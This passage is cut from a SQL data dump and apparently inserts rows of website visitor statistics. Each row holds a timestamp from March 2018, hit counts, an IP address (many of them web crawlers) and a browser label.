8.25','chrome'),(217825,1520617903,1,1,0,0,'52.91.120.227','other'),(217826,1520617994,1,1,0,0,'54.36.148.151','other'),(217827,1520618049,1,1,0,0,'91.226.34.19','chrome'),(217828,1520618111,1,1,0,0,'54.36.148.234','other'),(217829,1520618193,1,1,0,0,'146.120.30.255','chrome'),(217830,1520618493,1,1,0,0,'54.36.149.56','other'),(217831,1520618585,1,0,1,0,'66.249.66.195',''),(217832,1520619106,1,1,0,0,'52.91.120.227','other'),(217833,1520619260,1,1,0,0,'54.36.148.140','other'),(217834,1520619314,1,1,0,0,'91.209.11.236','other'),(217835,1520619324,1,1,0,0,'54.36.148.200','other'),(217836,1520619360,1,1,0,0,'8.29.198.26','other'),(217837,1520619452,1,1,0,0,'54.36.149.74','other'),(217838,1520619587,1,1,0,0,'54.36.149.51','other'),(217839,1520619625,1,1,0,0,'54.36.149.92','other'),(217840,1520619673,1,0,1,0,'66.249.66.157',''),(217841,1520619996,1,1,0,0,'54.36.148.213','other'),(217842,1520620062,1,1,0,0,'141.8.142.74','other'),(217843,1520620150,1,1,0,0,'54.36.149.48','other'),(217844,1520620203,1,1,0,0,'52.91.120.227','other'),(217845,1520620956,2,0,2,0,'66.249.66.199',''),(217846,1520621204,1,1,0,0,'54.36.149.7','other'),(217847,1520621242,1,1,0,0,'54.36.148.61','other'),(217848,1520621244,1,1,0,0,'52.91.120.227','other'),(217849,1520621272,1,1,0,0,'54.36.148.211','other'),(217850,1520621968,12,12,0,0,'23.237.4.26','other'),(217851,1520622116,1,1,0,0,'52.87.153.3','other'),(217852,1520622288,1,1,0,0,'54.36.148.116','other'),(217853,1520622294,1,1,0,0,'54.36.148.195','other'),(217854,1520622327,1,1,0,0,'54.36.148.172','other'),(217855,1520622386,1,1,0,0,'54.36.148.49','other'),(217856,1520622433,1,1,0,0,'52.91.120.227','other'),(217857,1520622438,1,1,0,0,'141.8.142.74','other'),(217858,1520622458,1,1,0,0,'54.210.1.251','other'),(217859,1520622504,1,1,0,0,'54.36.149.9','other'),(217860,1520622545,1,1,0,0,'54.36.148.237','other'),(217861,1520622588,1,1,0,0,'54.36.148.171','other'),(217862,1520622615,1,1,0,0,'54.36.149.51','other'),(217863,1520623023,1,1,0,0,'54.36.148.38','other'),(217864,1520623058,1,1,0,0,'52.87.153.3','other'),(217865,1520623105,1,1,0,0,'54.36.148.156','other'),(217866,1520623451,1,1,0,0,'54.210.1.251','other'),(217867,1520623584,1,1,0,0,'52.91.120.227','other'),(217868,1520623991,1,1,0,0,'52.87.153.3','other'),(217869,1520624229,1,1,0,0,'37.73.194.61','chrome'),(217870,1520624359,1,1,0,0,'54.210.1.251','other'),(217871,1520624719,1,1,0,0,'52.91.120.227','other'),(217872,1520624728,1,1,0,0,'54.36.148.35','other'),(217873,1520624863,1,1,0,0,'54.36.148.167','other'),(217874,1520624999,1,1,0,0,'54.36.148.50','other'),(217875,1520625177,1,1,0,0,'52.87.153.3','other'),(217876,1520625179,1,1,0,0,'178.154.171.88','other'),(217877,1520625314,1,1,0,0,'54.210.1.251','other'),(217878,1520625518,1,1,0,0,'217.69.133.59','other'),(217879,1520625758,1,1,0,0,'52.91.120.227','other'),(217880,1520625789,1,1,0,0,'54.36.148.66','other'),(217881,1520625925,1,1,0,0,'54.36.148.127','other'),(217882,1520626026,1,1,0,0,'54.36.149.31','other'),(217883,1520626240,1,1,0,0,'54.210.1.251','other'),(217884,1520626387,1,0,1,0,'66.249.66.201',''),(217885,1520626442,1,1,0,0,'52.87.153.3','other'),(217886,1520626496,1,1,0,0,'54.36.148.159','other'),(217887,1520626779,1,1,0,0,'52.91.120.227','other'),(217888,1520627195,1,1,0,0,'54.36.148.238','other'),(217889,1520627206,1,1,0,0,'54.210.1.251','other'),(217890,1520627404,1,1,0,0,'52.87.153.3','other'),(217891,1520627448,1,1,0,0,'54.36.148.87','other'),(217892,1520627452,1,1,0,0,'54.36.148.172','other'),(217893,1520627775,1,1,0,0,'52.91.120.227','other'),(217894,1520627917,1,1,0,0,'178.154.171.88','other'),(217895,1520628113,1,1,0,0,'54.210.1.251','other'),(217896,1520628193,1,0,1,0,'66.249.66.217',''),(217897,1520628200,1,1,0,0,'66.249.66.156','chrome'),(217898,1520628202,1,1,0,0,'66.249.66.157','chrome'),(217899,1520628384,1,1,0,0,'52.87.153.3','other'),(217900,1520628489,1,0,1,0,'66.249.66.201',''),(217901,1520628510,1,1,0,0,'54.36.148.27','other'),(217902,1520628632,1,1,0,0,'151.80.41.169','other'),(217903,1520628680,1,1,0,0,'54.36.148.204','other'),(217904,1520628734,1,1,0,0,'52.91.120.227','other'),(217905,1520629082,1,1,0,0,'54.36.149.44','other'),(217906,1520629365,1,1,0,0,'54.36.148.209','other'),(217907,1520629421,1,1,0,0,'52.87.153.3','other'),(217908,1520629551,1,0,1,0,'66.249.66.199',''),(217909,1520629578,1,1,0,0,'54.36.149.25','other'),(217910,1520629621,1,1,0,0,'54.36.148.173','other'),(217911,1520629764,1,1,0,0,'52.91.120.227','other'),(217912,1520629801,1,1,0,0,'54.36.148.110','other'),(217913,1520629889,1,1,0,0,'141.8.142.74','other'),(217914,1520629980,1,1,0,0,'54.36.148.183','other'),(217915,1520630195,1,1,0,0,'8.29.198.26','other'),(217916,1520630200,1,1,0,0,'46.161.9.56','chrome'),(217917,1520630270,1,1,0,0,'54.36.149.58','other'),(217918,1520630422,1,1,0,0,'52.87.153.3','other'),(217919,1520630537,1,1,0,0,'54.36.148.95','other'),(217920,1520630732,1,1,0,0,'52.91.120.227','other'),(217921,1520630922,1,1,0,0,'54.210.1.251','other'),(217922,1520630934,1,1,0,0,'54.36.148.114','other'),(217923,1520631242,1,0,1,0,'66.249.66.195',''),(217924,1520631261,3,3,0,0,'178.154.171.88','other'),(217925,1520631639,1,1,0,0,'52.91.120.227','other'),(217926,1520631691,1,1,0,0,'157.55.39.151','other'),(217927,1520631787,1,1,0,0,'54.36.149.28','other'),(217928,1520631825,1,1,0,0,'54.210.1.251','other'),(217929,1520631950,1,1,0,0,'54.36.148.117','other'),(217930,1520632024,1,1,0,0,'52.87.153.3','other'),(217931,1520632048,1,0,1,0,'66.249.66.156',''),(217932,1520632224,1,0,1,0,'66.249.66.199',''),(217933,1520632420,1,1,0,0,'54.36.148.178','other'),(217934,1520632740,1,1,0,0,'54.210.1.251','other'),(217935,1520632778,1,1,0,0,'52.91.120.227','other'),(217936,1520633152,1,1,0,0,'91.209.11.236','other'),(217937,1520633266,3,3,0,0,'141.8.142.74','other'),(217938,1520633444,1,1,0,0,'52.87.153.3','other'),(217939,1520633648,1,1,0,0,'66.249.66.199','chrome'),(217940,1520633651,1,1,0,0,'66.249.66.156','chrome'),(217941,1520633654,1,1,0,0,'54.210.1.251','other'),(217942,1520633691,1,1,0,0,'52.91.120.227','other'),(217943,1520634138,2,2,0,0,'91.209.11.236','other'),(217944,1520634578,1,1,0,0,'54.210.1.251','other'),(217945,1520634696,1,1,0,0,'52.87.153.3','other'),(217946,1520634911,1,1,0,0,'54.36.148.170','other'),(217947,1520634996,1,1,0,0,'54.36.148.239','other'),(217948,1520635030,1,1,0,0,'54.36.148.225','other'),(217949,1520635062,1,1,0,0,'52.91.120.227','other'),(217950,1520635117,1,1,0,0,'54.36.148.210','other'),(217951,1520635193,1,1,0,0,'157.55.39.151','other'),(217952,1520635448,1,0,1,0,'66.249.66.195',''),(217953,1520635560,1,1,0,0,'141.8.142.74','other'),(217954,1520635593,1,1,0,0,'54.210.1.251','other'),(217955,1520635657,1,1,0,0,'54.36.148.206','other'),(217956,1520635683,1,1,0,0,'54.36.148.30','other'),(217957,1520635793,3,3,0,0,'91.209.11.236','other'),(217958,1520635972,1,1,0,0,'52.91.120.227','other'),(217959,1520636213,1,1,0,0,'52.87.153.3','other'),(217960,1520636520,1,1,0,0,'54.210.1.251','other'),(217961,1520636627,1,1,0,0,'180.76.15.29','other'),(217962,1520636978,1,1,0,0,'52.91.120.227','other'),(217963,1520637115,1,1,0,0,'46.161.9.56','firefox'),(217964,1520637129,1,1,0,0,'52.87.153.3','other'),(217965,1520637216,1,1,0,0,'54.36.149.42','other'),(217966,1520637264,1,1,0,0,'54.36.148.10','other'),(217967,1520637303,1,0,1,0,'66.249.66.157',''),(217968,1520637498,1,1,0,0,'54.210.1.251','other'),(217969,1520637521,1,1,0,0,'178.154.171.88','other'),(217970,1520637599,1,1,0,0,'91.209.11.236','other'),(217971,1520637659,1,1,0,0,'173.208.206.50','other'),(217972,1520637700,1,1,0,0,'54.36.148.170','other'),(217973,1520638030,1,1,0,0,'52.87.153.3','other'),(217974,1520638218,1,1,0,0,'54.36.148.244','other'),(217975,1520638387,1,0,1,0,'66.249.66.195',''),(217976,1520638419,1,1,0,0,'54.210.1.251','other'),(217977,1520638534,1,1,0,0,'178.154.171.88','other'),(217978,1520638562,29,29,0,0,'5.102.0.10','other'),(217979,1520638640,1,1,0,0,'91.209.11.236','other'),(217980,1520638945,1,1,0,0,'54.36.148.214','other'),(217981,1520638981,1,1,0,0,'141.8.142.74','other'),(217982,1520639037,1,1,0,0,'52.87.153.3','other'),(217983,1520639114,1,1,0,0,'54.36.149.86','other'),(217984,1520639203,1,1,0,0,'85.195.118.42','firefox'),(217985,1520639262,1,1,0,0,'54.36.148.143','other'),(217986,1520639321,1,1,0,0,'54.210.1.251','other'),(217987,1520639687,1,1,0,0,'178.154.171.88','other'),(217988,1520639724,1,1,0,0,'85.195.118.42','chrome'),(217989,1520639757,2,1,1,0,'66.249.66.199',''),(217990,1520639764,1,1,0,0,'66.249.66.156','chrome'),(217991,1520640093,1,1,0,0,'52.87.153.3','other'),(217992,1520640241,1,1,0,0,'54.210.1.251','other'),(217993,1520640570,1,1,0,0,'54.36.148.195','other'),(217994,1520640700,1,1,0,0,'157.55.39.151','other'),(217995,1520640874,1,1,0,0,'54.36.148.231','other'),(217996,1520640918,1,1,0,0,'54.36.149.20','other'),(217997,1520641029,1,1,0,0,'8.29.198.26','other'),(217998,1520641143,1,1,0,0,'54.210.1.251','other'),(217999,1520641175,1,1,0,0,'54.36.148.200','other'),(218000,1520641248,1,1,0,0,'91.209.11.236','other'),(218001,1520641472,1,1,0,0,'52.87.153.3','other'),(218002,1520641708,1,1,0,0,'54.36.148.127','other'),(218003,1520641742,1,1,0,0,'217.69.133.243','other'),(218004,1520642063,1,1,0,0,'54.210.1.251','other'),(218005,1520642109,1,1,0,0,'54.36.148.30','other'),(218006,1520642440,1,1,0,0,'87.250.224.46','other'),(218007,1520642752,1,1,0,0,'52.87.153.3','other'),(218008,1520642805,1,1,0,0,'54.36.149.90','other'),(218009,1520642996,1,1,0,0,'54.36.148.149','other'),(218010,1520643012,1,1,0,0,'54.36.148.102','other'),(218011,1520643062,1,1,0,0,'54.36.148.171','other'),(218012,1520643123,1,1,0,0,'54.210.1.251','other'),(218013,1520643359,1,1,0,0,'207.46.13.125','other'),(218014,1520643505,1,1,0,0,'54.36.148.22','other'),(218015,1520643556,1,1,0,0,'54.36.148.153','other'),(218016,1520643773,1,1,0,0,'54.36.149.13','other'),(218017,1520643792,1,1,0,0,'54.36.148.74','other'),(218018,1520643937,1,1,0,0,'52.87.153.3','other'),(218019,1520644043,1,1,0,0,'54.210.1.251','other'),(218020,1520644131,1,1,0,0,'54.36.148.252','other'),(218021,1520644152,2,2,0,0,'91.209.11.236','other'),(218022,1520644182,1,1,0,0,'141.8.142.74','other'),(218023,1520644241,1,1,0,0,'37.9.113.182','other'),(218024,1520644447,1,1,0,0,'66.249.66.195','chrome'),(218025,1520644466,1,1,0,0,'66.249.66.156','chrome'),(218026,1520644619,1,1,0,0,'207.46.13.125','other'),(218027,1520644668,1,1,0,0,'54.36.148.133','other'),(218028,1520644698,1,1,0,0,'54.36.148.136','other'),(218029,1520644886,1,1,0,0,'54.36.148.20','other'),(218030,1520644958,1,1,0,0,'54.210.1.251','other'),(218031,1520645112,1,1,0,0,'54.36.148.56','other'),(218032,1520645243,1,1,0,0,'54.36.148.211','other'),(218033,1520645282,1,1,0,0,'52.87.153.3','other'),(218034,1520645399,1,1,0,0,'54.36.148.104','other'),(218035,1520645880,1,1,0,0,'54.210.1.251','other'),(218036,1520645881,1,0,1,0,'66.249.66.201',''),(218037,1520645963,1,1,0,0,'54.36.148.116','other'),(218038,1520645987,1,0,1,0,'66.249.66.157',''),(218039,1520646144,1,1,0,0,'52.91.120.227','other'),(218040,1520646316,1,1,0,0,'52.87.153.3','other'),(218041,1520646785,1,1,0,0,'91.209.11.236','other'),(218042,1520646799,1,1,0,0,'54.36.148.13','other'),(218043,1520646804,1,1,0,0,'54.210.1.251','other'),(218044,1520646829,1,1,0,0,'54.36.148.246','other'),(218045,1520646960,1,0,1,0,'66.249.66.195',''),(218046,1520646992,1,1,0,0,'54.36.148.248','other'),(218047,1520647142,1,1,0,0,'54.36.148.229','other'),(218048,1520647717,1,1,0,0,'54.165.59.7','other'),(218049,1520647740,2,2,0,0,'91.209.11.236','other'),(218050,1520647779,1,0,1,0,'66.249.66.156',''),(218051,1520647867,1,1,0,0,'54.36.149.49','other'),(218052,1520647895,1,1,0,0,'54.210.1.251','other'),(218053,1520647961,1,1,0,0,'37.9.113.115','other'),(218054,1520648054,1,1,0,0,'52.87.153.3','other'),(218055,1520648381,2,1,1,0,'66.249.66.195',''),(218056,1520648420,1,1,0,0,'128.69.152.114','msie'),(218057,1520648458,1,1,0,0,'54.36.148.64','other'),(218058,1520648801,1,1,0,0,'54.210.1.251','other'),(218059,1520648858,1,1,0,0,'54.36.148.25','other'),(218060,1520648963,1,1,0,0,'54.36.148.139','other'),(218061,1520648980,1,1,0,0,'54.36.148.87','other'),(218062,1520649143,1,1,0,0,'52.87.153.3','other'),(218063,1520649269,1,1,0,0,'54.36.148.242','other'),(218064,1520649281,1,1,0,0,'91.209.11.236','other'),(218065,1520649620,1,1,0,0,'54.36.148.186','other'),(218066,1520649753,1,1,0,0,'54.210.1.251','other'),(218067,1520649876,1,1,0,0,'66.249.66.201','chrome'),(218068,1520649887,1,1,0,0,'66.249.66.158','chrome'),(218069,1520650161,1,1,0,0,'54.36.149.28','other'),(218070,1520650292,1,1,0,0,'54.36.149.51','other'),(218071,1520650328,1,0,1,0,'66.249.66.156',''),(218072,1520650446,1,1,0,0,'52.91.120.227','other'),(218073,1520650684,1,1,0,0,'54.210.1.251','other'),(218074,1520651000,1,0,1,0,'66.249.66.199',''),(218075,1520651192,1,1,0,0,'141.8.142.74','other'),(218076,1520651562,1,1,0,0,'52.87.153.3','other'),(218077,1520651612,1,1,0,0,'54.210.1.251','other'),(218078,1520651753,1,1,0,0,'207.46.13.49','other'),(218079,1520651863,1,1,0,0,'8.29.198.25','other'),(218080,1520652166,2,2,0,0,'91.209.11.236','other'),(218081,1520652202,1,1,0,0,'54.36.148.91','other'),(218082,1520652254,1,1,0,0,'141.8.142.74','other'),(218083,1520652261,1,1,0,0,'87.250.224.46','other'),(218084,1520652267,1,1,0,0,'54.36.148.247','other'),(218085,1520652275,1,1,0,0,'34.232.77.215','other'),(218086,1520652730,1,1,0,0,'54.210.1.251','other'),(218087,1520652855,1,0,1,0,'66.249.66.195',''),(218088,1520653021,1,0,1,0,'66.249.66.157',''),(218089,1520653024,1,1,0,0,'54.36.148.220','other'),(218090,1520653108,1,1,0,0,'178.154.171.88','other'),(218091,1520653131,1,1,0,0,'52.87.153.3','other'),(218092,1520653198,1,1,0,0,'34.232.77.215','other'),(218093,1520653234,1,1,0,0,'54.36.148.47','other'),(218094,1520653285,1,1,0,0,'52.91.120.227','other'),(218095,1520653650,1,1,0,0,'54.210.1.251','other'),(218096,1520653799,1,1,0,0,'213.180.203.8','other'),(218097,1520653806,1,1,0,0,'54.36.149.62','other'),(218098,1520653864,1,1,0,0,'91.209.11.236','other'),(218099,1520654031,1,1,0,0,'54.36.148.68','other'),(218100,1520654126,1,1,0,0,'34.232.77.215','other'),(218101,1520654148,1,0,1,0,'66.249.66.201',''),(218102,1520654449,1,1,0,0,'54.36.149.94','other'),(218103,1520654454,1,1,0,0,'52.87.153.3','other'),(218104,1520654572,1,1,0,0,'54.210.1.251','other'),(218105,1520654783,2,2,0,0,'178.154.171.88','other'),(218106,1520655049,1,1,0,0,'34.232.77.215','other'),(218107,1520655153,1,1,0,0,'54.36.148.127','other'),(218108,1520655173,1,1,0,0,'66.249.66.195','chrome'),(218109,1520655183,1,1,0,0,'66.249.66.157','chrome'),(218110,1520655211,1,1,0,0,'54.36.148.157','other'),(218111,1520655472,1,1,0,0,'52.87.153.3','other'),(218112,1520655581,1,1,0,0,'54.36.149.18','other'),(218113,1520655626,1,1,0,0,'52.91.120.227','other'),(218114,1520655706,1,0,1,0,'66.249.66.199',''),(218115,1520655708,1,1,0,0,'54.210.1.251','other'),(218116,1520655791,1,1,0,0,'141.8.142.74','other'),(218117,1520655901,1,1,0,0,'54.36.149.6','other'),(218118,1520656275,1,0,1,0,'66.249.66.195',''),(218119,1520656494,1,1,0,0,'54.36.148.102','other'),(218120,1520656628,2,0,2,0,'66.249.66.201',''),(218121,1520656630,1,1,0,0,'54.210.1.251','other'),(218122,1520657098,1,0,1,0,'66.249.66.156',''),(218123,1520657295,1,1,0,0,'54.36.148.119','other'),(218124,1520657470,1,1,0,0,'54.36.149.63','other'),(218125,1520657539,1,1,0,0,'141.8.142.74','other'),(218126,1520657560,1,1,0,0,'54.210.1.251','other'),(218127,1520657648,4,4,0,0,'92.113.188.43','chrome'),(218128,1520657661,1,1,0,0,'180.76.15.32','other'),(218129,1520657736,1,1,0,0,'178.154.171.88','other'),(218130,1520657872,1,0,1,0,'66.249.66.201',''),(218131,1520658009,1,0,1,0,'66.249.66.199',''),(218132,1520658025,1,1,0,0,'54.36.149.1','other'),(218133,1520658276,1,1,0,0,'52.91.120.227','other'),(218134,1520658360,1,1,0,0,'217.69.133.228','other'),(218135,1520658466,1,1,0,0,'54.36.148.70','other'),(218136,1520658478,1,1,0,0,'54.210.1.251','other'),(218137,1520658641,1,1,0,0,'91.209.11.236','other'),(218138,1520658825,1,1,0,0,'54.36.148.160','other'),(218139,1520658894,1,1,0,0,'54.36.149.44','other'),(218140,1520659326,1,1,0,0,'54.36.148.158','other'),(218141,1520659342,1,1,0,0,'54.36.149.72','other'),(218142,1520659384,1,1,0,0,'54.210.1.251','other'),(218143,1520659537,1,1,0,0,'217.69.133.250','other'),(218144,1520659688,1,0,1,0,'66.249.66.201',''),(218145,1520659835,1,1,0,0,'46.161.9.39','firefox'),(218146,1520660089,1,1,0,0,'54.36.148.147','other'),(218147,1520660154,2,2,0,0,'66.249.66.199','chrome'),(218148,1520660195,1,1,0,0,'54.36.148.125','other'),(218149,1520660296,1,1,0,0,'52.91.120.227','other'),(218150,1520660333,1,1,0,0,'54.210.1.251','other'),(218151,1520660548,2,2,0,0,'178.154.171.88','other'),(218152,1520660709,1,1,0,0,'66.249.66.157','chrome'),(218153,1520660760,1,1,0,0,'54.36.148.19','other'),(218154,1520661201,1,0,1,0,'66.249.66.156',''),(218155,1520661253,1,1,0,0,'54.210.1.251','other'),(218156,1520661460,1,1,0,0,'54.36.148.132','other'),(218157,1520661518,1,1,0,0,'85.195.118.42','firefox'),(218158,1520661543,1,0,1,0,'66.249.66.158',''),(218159,1520661844,1,1,0,0,'54.36.149.88','other'),(218160,1520661931,1,1,0,0,'141.8.142.74','other'),(218161,1520661957,1,0,1,0,'66.249.66.157',''),(218162,1520661976,1,1,0,0,'91.209.11.236','other'),(218163,1520662090,1,1,0,0,'54.36.148.238','other'),(218164,1520662108,1,1,0,0,'54.36.148.176','other'),(218165,1520662156,1,1,0,0,'52.91.120.227','other'),(218166,1520662168,1,1,0,0,'54.210.1.251','other'),(218167,1520662332,1,1,0,0,'54.36.148.199','other'),(218168,1520662340,1,0,1,0,'66.249.66.199',''),(218169,1520662416,1,1,0,0,'54.36.148.236','other'),(218170,1520662466,1,1,0,0,'54.36.149.49','other'),(218171,1520662701,1,1,0,0,'8.29.198.26','other'),(218172,1520662816,1,1,0,0,'94.180.242.113','msie'),(218173,1520662881,1,1,0,0,'216.244.66.194','other'),(218174,1520663095,1,1,0,0,'54.210.1.251','other'),(218175,1520663336,1,1,0,0,'54.36.148.238','other'),(218176,1520663347,1,1,0,0,'54.36.149.45','other'),(218177,1520663376,1,0,1,0,'66.249.66.201',''),(218178,1520663662,1,0,1,0,'66.249.66.157',''),(218179,1520663782,2,0,2,0,'66.249.66.195',''),(218180,1520663865,1,1,0,0,'141.8.142.74','other'),(218181,1520664014,1,1,0,0,'54.210.1.251','other'),(218182,1520664124,1,1,0,0,'52.91.120.227','other'),(218183,1520664224,1,1,0,0,'54.36.149.70','other'),(218184,1520664471,1,1,0,0,'91.196.178.47','chrome'),(218185,1520664731,1,1,0,0,'66.249.66.201','chrome'),(218186,1520664927,1,1,0,0,'54.210.1.251','other'),(218187,1520664984,1,1,0,0,'54.36.148.19','other'),(218188,1520665279,1,1,0,0,'87.250.224.46','other'),(218189,1520665302,1,1,0,0,'54.36.149.77','other'),(218190,1520665538,1,1,0,0,'52.91.120.227','other'),(218191,1520665655,1,1,0,0,'217.69.136.208','other'),(218192,1520665686,1,1,0,0,'54.36.149.44','other'),(218193,1520665822,1,0,1,0,'66.249.66.158',''),(218194,1520665837,1,1,0,0,'54.210.1.251','other'),(218195,1520666070,1,1,0,0,'178.154.171.88','other'),(218196,1520666173,1,1,0,0,'85.195.118.42','firefox'),(218197,1520666189,2,1,1,0,'66.249.66.199',''),(218198,1520666193,1,1,0,0,'66.249.66.156','chrome'),(218199,1520666384,1,1,0,0,'54.36.148.80','other'),(218200,1520666540,1,1,0,0,'141.8.142.74','other'),(218201,1520666757,1,1,0,0,'54.210.1.251','other'),(218202,1520666824,1,1,0,0,'54.36.148.229','other'),(218203,1520667053,1,1,0,0,'216.244.66.246','other'),(218204,1520667389,1,1,0,0,'52.91.120.227','other'),(218205,1520667519,2,0,2,0,'66.249.66.201',''),(218206,1520667663,1,1,0,0,'54.210.1.251','other'),(218207,1520667911,1,1,0,0,'52.87.153.3','other'),(218208,1520668165,1,1,0,0,'54.36.149.22','other'),(218209,1520668424,1,1,0,0,'91.209.11.236','other'),(218210,1520668502,17,17,0,0,'136.243.68.226','other'),(218211,1520668582,1,1,0,0,'54.210.1.251','other'),(218212,1520668674,1,1,0,0,'54.36.148.119','other'),(218213,1520669105,1,1,0,0,'141.8.142.74','other'),(218214,1520669182,1,1,0,0,'52.91.120.227','other'),(218215,1520669498,1,1,0,0,'54.210.1.251','other'),(218216,1520669509,1,1,0,0,'54.36.148.102','other'),(218217,1520669648,1,1,0,0,'180.76.15.17','other'),(218218,1520669885,1,0,1,0,'66.249.66.199',''),(218219,1520669959,1,1,0,0,'91.209.11.236','other'),(218220,1520670083,1,1,0,0,'54.36.148.207','other'),(218221,1520670252,2,2,0,0,'178.154.171.88','other'),(218222,1520670293,1,1,0,0,'216.244.66.194','other'),(218223,1520670402,1,1,0,0,'54.36.148.51','other'),(218224,1520670463,1,1,0,0,'54.210.1.251','other'),(218225,1520670473,1,1,0,0,'34.232.77.215','other'),(218226,1520670509,1,0,1,0,'66.249.66.195',''),(218227,1520670677,1,1,0,0,'217.69.133.216','other'),(218228,1520670958,1,1,0,0,'52.91.120.227','other'),(218229,1520671159,1,1,0,0,'141.8.142.74','other'),(218230,1520671276,1,1,0,0,'54.36.149.33','other'),(218231,1520671377,1,1,0,0,'34.232.77.215','other'),(218232,1520671514,1,1,0,0,'54.36.148.222','other'),(218233,1520671530,1,1,0,0,'54.36.148.184','other'),(218234,1520671604,2,1,1,0,'66.249.66.201',''),(218235,1520671607,1,1,0,0,'66.249.66.158','chrome'),(218236,1520671948,1,1,0,0,'54.36.149.60','other'),(218237,1520672193,1,1,0,0,'178.154.171.88','other'),(218238,1520672210,1,1,0,0,'66.249.66.195','chrome'),(218239,1520672302,1,1,0,0,'34.232.77.215','other'),(218240,1520672396,1,1,0,0,'54.36.148.138','other'),(218241,1520672602,1,1,0,0,'217.69.133.67','other'),(218242,1520672613,1,1,0,0,'52.91.120.227','other'),(218243,1520672666,1,1,0,0,'87.250.224.46','other'),(218244,1520672755,1,1,0,0,'54.36.148.41','other'),(218245,1520672845,3,3,0,0,'141.8.142.74','other'),(218246,1520672864,1,1,0,0,'54.36.148.30','other'),(218247,1520673041,1,1,0,0,'91.209.11.236','other'),(218248,1520673222,1,1,0,0,'34.232.77.215','other'),(218249,1520673541,1,1,0,0,'8.29.198.27','other'),(218250,1520673635,1,1,0,0,'54.210.1.251','other'),(218251,1520673670,1,1,0,0,'54.36.148.49','other'),(218252,1520673834,1,1,0,0,'217.69.133.30','other'),(218253,1520674048,1,1,0,0,'178.154.171.88','other'),(218254,1520674138,1,1,0,0,'34.232.77.215','other'),(218255,1520674237,1,1,0,0,'52.91.120.227','other'),(218256,1520674560,1,1,0,0,'54.210.1.251','other'),(218257,1520674571,2,2,0,0,'54.165.59.7','other'),(218258,1520674694,2,2,0,0,'141.8.142.74','other'),(218259,1520674756,1,1,0,0,'157.55.39.149','other'),(218260,1520675030,1,1,0,0,'54.36.148.92','other'),(218261,1520675118,1,1,0,0,'34.232.77.215','other'),(218262,1520675281,1,1,0,0,'54.36.149.107','other'),(218263,1520675400,1,1,0,0,'54.36.148.34','other'),(218264,1520675412,1,0,1,0,'66.249.66.156',''),(218265,1520675444,1,1,0,0,'54.36.148.151','other'),(218266,1520675544,1,1,0,0,'54.210.1.251','other'),(218267,1520675664,1,1,0,0,'94.179.208.67','chrome'),(218268,1520676026,1,1,0,0,'34.232.77.215','other'),(218269,1520676151,1,1,0,0,'52.91.120.227','other'),(218270,1520676381,1,1,0,0,'91.209.11.236','other'),(218271,1520676449,1,1,0,0,'54.210.1.251','other'),(218272,1520676713,1,1,0,0,'52.87.153.3','other'),(218273,1520676936,1,1,0,0,'34.232.77.215','other'),(218274,1520677217,1,0,1,0,'66.249.66.199',''),(218275,1520677366,1,1,0,0,'54.210.1.251','other'),(218276,1520677447,2,2,0,0,'141.8.142.74','other'),(218277,1520677673,1,1,0,0,'52.91.120.227','other'),(218278,1520677862,1,1,0,0,'34.232.77.215','other'),(218279,1520677932,1,1,0,0,'52.87.153.3','other'),(218280,1520677960,1,1,0,0,'54.36.148.97','other'),(218281,1520678096,1,1,0,0,'91.209.11.236','other'),(218282,1520678118,1,1,0,0,'66.249.66.199','chrome'),(218283,1520678250,1,1,0,0,'66.249.66.157','chrome'),(218284,1520678280,1,1,0,0,'54.210.1.251','other'),(218285,1520678626,1,1,0,0,'54.36.148.170','other'),(218286,1520679081,1,1,0,0,'52.87.153.3','other'),(218287,1520679193,1,1,0,0,'54.210.1.251','other'),(218288,1520679211,1,1,0,0,'52.91.120.227','other'),(218289,1520679219,2,2,0,0,'91.209.11.236','other'),(218290,1520679491,1,1,0,0,'207.46.13.49','other'),(218291,1520679641,1,1,0,0,'54.36.148.179','other'),(218292,1520679980,1,1,0,0,'54.36.149.85','other'),(218293,1520680109,1,1,0,0,'54.210.1.251','other'),(218294,1520680409,1,1,0,0,'52.87.153.3','other'),(218295,1520680493,1,1,0,0,'178.154.171.88','other'),(218296,1520680499,1,1,0,0,'141.8.142.74','other'),(218297,1520680502,1,1,0,0,'87.250.224.46','other'),(218298,1520680552,1,1,0,0,'217.69.133.222','other'),(218299,1520680661,1,1,0,0,'54.36.148.26','other'),(218300,1520680710,1,1,0,0,'52.91.120.227','other'),(218301,1520681011,1,1,0,0,'54.210.1.251','other'),(218302,1520681086,1,1,0,0,'91.209.11.236','other'),(218303,1520681429,1,1,0,0,'54.36.148.228','other'),(218304,1520681760,1,1,0,0,'141.8.142.74','other'),(218305,1520681773,1,1,0,0,'52.87.153.3','other'),(218306,1520681918,1,1,0,0,'54.210.1.251','other'),(218307,1520681998,1,1,0,0,'54.36.149.23','other'),(218308,1520682076,1,1,0,0,'91.209.11.236','other'),(218309,1520682127,1,1,0,0,'52.91.120.227','other'),(218310,1520682256,1,0,1,0,'66.249.66.199',''),(218311,1520682754,1,1,0,0,'52.87.153.3','other'),(218312,1520682838,1,1,0,0,'54.210.1.251','other'),(218313,1520683127,1,1,0,0,'54.36.149.6','other'),(218314,1520683483,1,1,0,0,'54.36.149.67','other'),(218315,1520683528,1,1,0,0,'52.91.120.227','other'),(218316,1520683639,1,1,0,0,'66.249.66.199','chrome'),(218317,1520683704,1,1,0,0,'54.36.149.39','other'),(218318,1520683739,1,1,0,0,'54.210.1.251','other'),(218319,1520683921,1,1,0,0,'52.87.153.3','other'),(218320,1520684388,1,1,0,0,'8.29.198.27','other'),(218321,1520684439,1,0,1,0,'66.249.66.195',''),(218322,1520684448,2,2,0,0,'46.211.25.98','chrome'),(218323,1520684514,1,1,0,0,'54.36.148.195','other'),(218324,1520684660,1,1,0,0,'54.210.1.251','other'),(218325,1520684667,1,1,0,0,'54.36.149.98','other'),(218326,1520684752,1,1,0,0,'141.8.142.74','other'),(218327,1520684920,1,1,0,0,'52.91.120.227','other'),(218328,1520685073,1,1,0,0,'54.36.148.149','other'),(218329,1520685169,1,1,0,0,'52.87.153.3','other'),(218330,1520685245,1,0,1,0,'66.249.66.158',''),(218331,1520685572,1,1,0,0,'54.210.1.251','other'),(218332,1520685579,1,1,0,0,'91.196.178.52','chrome'),(218333,1520685654,1,1,0,0,'66.249.66.199','chrome'),(218334,1520685671,1,1,0,0,'91.209.11.236','other'),(218335,1520685732,1,1,0,0,'66.249.66.156','chrome'),(218336,1520685836,1,1,0,0,'34.232.77.215','other'),(218337,1520685877,1,1,0,0,'54.36.148.191','other'),(218338,1520685966,1,1,0,0,'54.36.148.61','other'),(218339,1520686190,1,1,0,0,'52.87.153.3','other'),(218340,1520686316,1,1,0,0,'52.91.120.227','other'),